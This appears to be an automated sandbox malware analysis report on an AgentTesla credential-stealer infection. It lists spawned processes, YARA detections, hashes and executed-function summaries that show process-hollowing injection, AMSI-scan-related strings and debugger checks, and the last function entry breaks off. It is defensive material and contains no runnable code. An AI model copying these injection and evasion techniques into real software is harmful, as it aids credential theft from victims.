Target ID:	28
Start time:	12:02:45
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\neworigin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\neworigin.exe"
Imagebase:	0x8f0000
File size:	250'368 bytes
MD5 hash:	D6A4CF0966D24C1EA836BA9A899751E5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.2693859207.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.2693859207.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.2693859207.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	12:02:46
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Imagebase:	0xd0000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	12:02:52
Start date:	11/11/2024
Path:	C:\Users\Public\Libraries\Wisrysxl.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Wisrysxl.PIF"
Imagebase:	0x400000
File size:	1'056'768 bytes
MD5 hash:	BDC3B662D1136F20F51F55A0F6A2FB9D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	12:02:53
Start date:	11/11/2024
Path:	C:\Users\Public\Libraries\lxsyrsiW.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\lxsyrsiW.pif
Imagebase:	0x400000
File size:	68'096 bytes
MD5 hash:	C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	12:02:54
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\neworigin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\neworigin.exe"
Imagebase:	0xd60000
File size:	250'368 bytes
MD5 hash:	D6A4CF0966D24C1EA836BA9A899751E5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.2692159904.000000000307C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.2692159904.0000000003084000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000020.00000002.2692159904.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.2692159904.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	12:02:54
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Imagebase:	0x1f0000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	12:03:00
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Imagebase:	0xbb0000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	14.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	30.1%
Total number of Nodes:	1649
Total number of Limit Nodes:	19

Executed Functions

Function 02A18D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654
threadnativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02A189D0: FreeLibrary.KERNEL32(75280000,00000000,00000000,00000000,00000000,02A8738C,Function_0000662C,00000004,02A8739C,02A8738C,05F5E103,00000040,02A873A0,75280000,00000000,00000000), ref: 02A18AAA

Part of subcall function 02A18788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02A18814

GetThreadContext.KERNEL32(000008A8,02A87424,ScanString,02A873A8,02A1A93C,UacInitialize,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,UacInitialize,02A873A8), ref: 02A19602

Part of subcall function 02A18400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A18471

Part of subcall function 02A18670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02A186D5

Part of subcall function 02A17A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02A17A9F

Part of subcall function 02A17D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A17DEC

SetThreadContext.KERNEL32(000008A8,02A87424,ScanBuffer,02A873A8,02A1A93C,ScanString,02A873A8,02A1A93C,Initialize,02A873A8,02A1A93C,000008A4,00326FF8,02A874FC,00000004,02A87500), ref: 02A1A317
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008A8,00000000,000008A8,02A87424,ScanBuffer,02A873A8,02A1A93C,ScanString,02A873A8,02A1A93C,Initialize,02A873A8,02A1A93C,000008A4,00326FF8,02A874FC), ref: 02A1A324

Part of subcall function 02A1894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A8,00000000,02A873A8,02A1A587,ScanString,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,Initialize,02A873A8,02A1A93C,UacScan), ref: 02A18960
Part of subcall function 02A1894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02A1897A
Part of subcall function 02A1894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A8,00000000,02A873A8,02A1A587,ScanString,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,Initialize), ref: 02A189B6

Strings

OpenSession, xrefs: 02A18DA9, 02A191CC, 02A1927E, 02A1A64F, 02A1A795
NtReadVirtualMemory, xrefs: 02A1A620
advapi32, xrefs: 02A1A705
ScanBuffer, xrefs: 02A18ECC, 02A18F54, 02A192EF, 02A19404, 02A194A1, 02A197DA, 02A19961, 02A19AF4, 02A19CD9, 02A19DEE, 02A19FAC, 02A1A11C, 02A1A28F, 02A1A483, 02A1A6A1, 02A1A7E7
NtOpenProcess, xrefs: 02A1A8A3
ntdll, xrefs: 02A1A625, 02A1A639, 02A1A6F1, 02A1A894, 02A1A8A8
UacInitialize, xrefs: 02A19032, 02A19393, 02A19512, 02A19616, 02A19A12, 02A19B86, 02A1A330
BCryptVerifySignature, xrefs: 02A1A573
NtOpenObjectAuditAlarm, xrefs: 02A1A634, 02A1A6EC
Initialize, xrefs: 02A190EA, 02A196F8, 02A1987F, 02A19C68, 02A19ECA, 02A1A03A, 02A1A1AD, 02A1A412, 02A1A743
I_QueryTagInformation, xrefs: 02A1A700
NtSetSecurityObject, xrefs: 02A1A88F
sppc, xrefs: 02A19376
ScanString, xrefs: 02A18E02, 02A18FAD, 02A1915B, 02A19583, 02A19769, 02A198F0, 02A19D7D, 02A19F3B, 02A1A0AB, 02A1A21E, 02A1A509, 02A1A5B6
SLGetLicenseInformation, xrefs: 02A1935F
BCryptRegisterProvider, xrefs: 02A1A59B
bcrypt, xrefs: 02A1A578, 02A1A58C, 02A1A5A0
dbgcore, xrefs: 02A1A719, 02A1A72D
UacScan, xrefs: 02A18E73, 02A1908B, 02A19687, 02A19A83, 02A19BF7, 02A1A3A1, 02A1A839
BCryptQueryProviderRegistration, xrefs: 02A1A587
MiniDumpReadDumpStream, xrefs: 02A1A728
MiniDumpWriteDump, xrefs: 02A1A714

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 2388221946-51457883
Opcode ID: 2e5cb7114070bce631d0558db37b5b81c45befe7e46512587efe74950feec27f
Instruction ID: 8e8bedcefa3b5d48f6beaa8f6ced2d76c69442c9ad3859460c877f7fbf4000b3
Opcode Fuzzy Hash: 2e5cb7114070bce631d0558db37b5b81c45befe7e46512587efe74950feec27f
Instruction Fuzzy Hash: 0DE22E34A815589FDB11EB64EEC0BDE73BABF88310F1041A1E105AB259DE30EE95CF95

Function 02A18D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02A189D0: FreeLibrary.KERNEL32(75280000,00000000,00000000,00000000,00000000,02A8738C,Function_0000662C,00000004,02A8739C,02A8738C,05F5E103,00000040,02A873A0,75280000,00000000,00000000), ref: 02A18AAA

Part of subcall function 02A18788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02A18814

GetThreadContext.KERNEL32(000008A8,02A87424,ScanString,02A873A8,02A1A93C,UacInitialize,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,UacInitialize,02A873A8), ref: 02A19602

Part of subcall function 02A18400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A18471

Part of subcall function 02A18670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02A186D5

Part of subcall function 02A17A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02A17A9F

Strings

OpenSession, xrefs: 02A18DA9, 02A191CC, 02A1927E, 02A1A64F, 02A1A795
NtReadVirtualMemory, xrefs: 02A1A620
advapi32, xrefs: 02A1A705
ScanBuffer, xrefs: 02A18ECC, 02A18F54, 02A192EF, 02A19404, 02A194A1, 02A197DA, 02A19961, 02A19AF4, 02A19CD9, 02A19DEE, 02A19FAC, 02A1A11C, 02A1A28F, 02A1A483, 02A1A6A1, 02A1A7E7
NtOpenProcess, xrefs: 02A1A8A3
ntdll, xrefs: 02A1A625, 02A1A639, 02A1A6F1, 02A1A894, 02A1A8A8
UacInitialize, xrefs: 02A19032, 02A19393, 02A19512, 02A19616, 02A1A330
BCryptVerifySignature, xrefs: 02A1A573
NtOpenObjectAuditAlarm, xrefs: 02A1A634, 02A1A6EC
Initialize, xrefs: 02A190EA, 02A196F8, 02A1987F, 02A19C68, 02A19ECA, 02A1A03A, 02A1A1AD, 02A1A412, 02A1A743
I_QueryTagInformation, xrefs: 02A1A700
NtSetSecurityObject, xrefs: 02A1A88F
sppc, xrefs: 02A19376
ScanString, xrefs: 02A18E02, 02A18FAD, 02A1915B, 02A19583, 02A19769, 02A198F0, 02A19D7D, 02A19F3B, 02A1A0AB, 02A1A21E, 02A1A509, 02A1A5B6
SLGetLicenseInformation, xrefs: 02A1935F
BCryptRegisterProvider, xrefs: 02A1A59B
bcrypt, xrefs: 02A1A578, 02A1A58C, 02A1A5A0
dbgcore, xrefs: 02A1A719, 02A1A72D
UacScan, xrefs: 02A18E73, 02A1908B, 02A19687, 02A19A83, 02A19BF7, 02A1A3A1, 02A1A839
BCryptQueryProviderRegistration, xrefs: 02A1A587
MiniDumpReadDumpStream, xrefs: 02A1A728
MiniDumpWriteDump, xrefs: 02A1A714

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 3386062106-51457883
Opcode ID: 2975572fd1054efc7d5f74f72d4a5af85862ed3e9c2e96967289dbcb705398f7
Instruction ID: 038e9048143279bdc2de389b2b3cd14c0a3f288442a1ec2fc3e196b1353a78ab
Opcode Fuzzy Hash: 2975572fd1054efc7d5f74f72d4a5af85862ed3e9c2e96967289dbcb705398f7
Instruction Fuzzy Hash: 78E23E34A815589FDB11EB64EEC0BDE73BABF88310F1041A1E105AB259DE30EE95CF95

Function 02A05ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A00000,02A2E790), ref: 02A05AE8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A00000,02A2E790), ref: 02A05B06
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A00000,02A2E790), ref: 02A05B24
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02A05B42
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02A05BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02A05B8B
RegQueryValueExA.ADVAPI32(?,02A05D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02A05BD1,?,80000001), ref: 02A05BA9
RegCloseKey.ADVAPI32(?,02A05BD8,00000000,?,?,00000000,02A05BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A05BCB
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02A05BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02A05BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02A05BFB
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02A05C26
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A05C6D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A05C7D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A05CA5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A05CB5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02A05CDB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02A05CEB

Strings

Software\Borland\Locales, xrefs: 02A05AFC, 02A05B1A
Software\Borland\Delphi\Locales, xrefs: 02A05B38

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 70dd7cffabf37d7b7a0cfa52373ee44142389c3e4b59fb9e7b22d924cf48ca1d
Instruction ID: 31087d50015505282b23d42fd9d247394aad6ed61d5a48efe59d5eb85c069f6d
Opcode Fuzzy Hash: 70dd7cffabf37d7b7a0cfa52373ee44142389c3e4b59fb9e7b22d924cf48ca1d
Instruction Fuzzy Hash: E9515471E4025C7AFB25D6A4ADC6FEFB7ADAB08744F4001A5BA04E61C1EE749A448F60

Function 02A1894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(bcrypt,?,000008A8,00000000,02A873A8,02A1A587,ScanString,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,Initialize,02A873A8,02A1A93C,UacScan), ref: 02A18960
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02A1897A
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A8,00000000,02A873A8,02A1A587,ScanString,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,Initialize), ref: 02A189B6

Part of subcall function 02A17D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A17DEC

Strings

bcrypt, xrefs: 02A1895F
BCryptVerifySignature, xrefs: 02A18973

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: 9fbf6d6b0c088b76ddf7ef2caaf20980fd327b49d3c3ff7a169480d4ff0f87a2
Instruction ID: 4a9f1a5aa76207f5a1a2da7ddef180564ea80050feb6e9b3ed19003cd81b986b
Opcode Fuzzy Hash: 9fbf6d6b0c088b76ddf7ef2caaf20980fd327b49d3c3ff7a169480d4ff0f87a2
Instruction Fuzzy Hash: E2F04475EC13146EE310A769ADC9F57F79CD746724F2009A9F90887180CF7594528B52

Function 02A1F744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 02A1F754
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02A1F766
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02A1F77D

Strings

KernelBase, xrefs: 02A1F74F
CheckRemoteDebuggerPresent, xrefs: 02A1F760

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: 96b1857a67b78fc11c40eed569c9799a18be4ea38e8629397733ae2c5610d2cd
Instruction ID: db11b277eded32e5f96d8578597e14d45bc208a4435b920247aaa527b7479d15
Opcode Fuzzy Hash: 96b1857a67b78fc11c40eed569c9799a18be4ea38e8629397733ae2c5610d2cd
Instruction Fuzzy Hash: CDF08270904398FEEB10A7F888C879CBBA96F05338F2843909425A25C1EB7506508A61

Function 02A1DD70 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02A04F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02A04F2E

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A1DE40), ref: 02A1DDAB
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02A1DE40), ref: 02A1DDDB
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02A1DDF0
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02A1DE1C
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02A1DE25

Part of subcall function 02A04C60: SysFreeString.OLEAUT32(02A1F4A4), ref: 02A04C6E

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: 6e64eb300950c3605369f0ac1359e570b5e03ab73c87f12e1a7c9eed780335bf
Instruction ID: ac4253cb68560ba402937f11b29e996222775635e26ed23163d42f6be302322f
Opcode Fuzzy Hash: 6e64eb300950c3605369f0ac1359e570b5e03ab73c87f12e1a7c9eed780335bf
Instruction Fuzzy Hash: E621C071A84708BEEB51EA94DD92FDE77ADAB48B10F500461B701E71C0DE74AA048B54

Function 02A1E4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02A1E5F6

Strings

OpenSession, xrefs: 02A1E598
ScanBuffer, xrefs: 02A1E53F
Initialize, xrefs: 02A1E4E6

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: b07f510d9d1693f50a84cc4b7c8f9d009adbf8c87c2e54f56a048a8e4f79d2b7
Instruction ID: 581bf39ed1325a890fc1ab9d26c6b05b2d9334b9eb63b128e4f06df69ed6b901
Opcode Fuzzy Hash: b07f510d9d1693f50a84cc4b7c8f9d009adbf8c87c2e54f56a048a8e4f79d2b7
Instruction Fuzzy Hash: 8C413235F80248ABEB01EBA4EA81ADEB3FAFF8C710F504435E551A7284DE34AD118F55

Function 02A1DC8C Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON

Download Yara Rule

APIs

Part of subcall function 02A04F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02A04F2E

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A1DD5E), ref: 02A1DCCB
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02A1DD05
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02A1DD32
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02A1DD3B

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

